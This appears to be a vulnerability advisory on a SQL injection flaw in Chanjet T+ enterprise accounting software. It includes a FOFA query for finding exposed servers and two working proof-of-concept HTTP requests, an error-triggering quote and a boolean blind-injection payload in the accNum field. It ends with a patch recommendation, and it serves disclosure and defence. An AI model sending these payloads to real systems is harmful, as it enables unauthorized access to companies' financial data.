Chanjet T+SQL Injection Vulnerability
Disclaimer: Do not use the relevant technologies in this article to engage in illegal testing. Any direct or indirect consequences and losses caused by the dissemination and use of the information or tools provided in this article shall be borne by the user himself. Adverse consequences have nothing to do with the article author. This article is for educational purposes only.
1. Product Introduction
Chanjet T+ is a new type of enterprise management software based on the Internet. Its functional modules include: financial management, procurement management, inventory management, etc. It is mainly aimed at the financial business integration application of small and medium-sized industrial, trade and commercial enterprises, incorporating elements such as socialization, mobility, Internet of Things, e-commerce, and Internet information subscription.
2. Vulnerability overview
A certain background function point of Chanjet T+ only checks the authority, but does not filter the user input, resulting in a SQL injection vulnerability after the authority is bypassed, and the attacker can finally realize remote command execution by exploiting this vulnerability.
3. Scope of influence
Chanjet T+ 13.0
Chanjet T+ 16.0
4. Reproduction environment
FOFA: app="Chanjet-TPlus"
5. Vulnerability recurrence
PoC
POST /tplus/ajaxpro/Ufida.T.SM.UIP.MultiCompanyController,Ufida.T.SM.UIP.ashx?method=CheckMutex HTTP/1.1
Host: your-ip
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0
{
"accNum": "3'", "functionTag": "SYS0104", "url": ""}
It can be found that adding single quotes to the accNum parameter will cause a database error. In this case, there is usually SQL injection.
Construct a Boolean blind injection payload
POST /tplus/ajaxpro/Ufida.T.SM.UIP.MultiCompanyController,Ufida.T.SM.UIP.ashx?method=CheckMutex HTTP/1.1
Host: your-ip
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0
{
"accNum": "3' AND 5227 IN (SELECT (CHAR(113)+CHAR(118)+CHAR(112)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (5227=5227) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(107)+CHAR(120)+CHAR(113)))-- NCab", "functionTag": "SYS0104", "url": ""}
A sql statement with a subquery is written here, and a Boolean query is constructed by judging whether 5227 is equal to 5227. If it returns true, execute SELECT CHAR(49), that is, return character 1, otherwise return character 0.
PS: The decimal numbers in CHAR() correspond to the strings in the ASCII table.
It can be seen that "1" is returned, and the loophole exists
Verify using sqlmap
6. Repair suggestions
At present, the official has released a patch update, and it is recommended that affected users install it as soon as possible.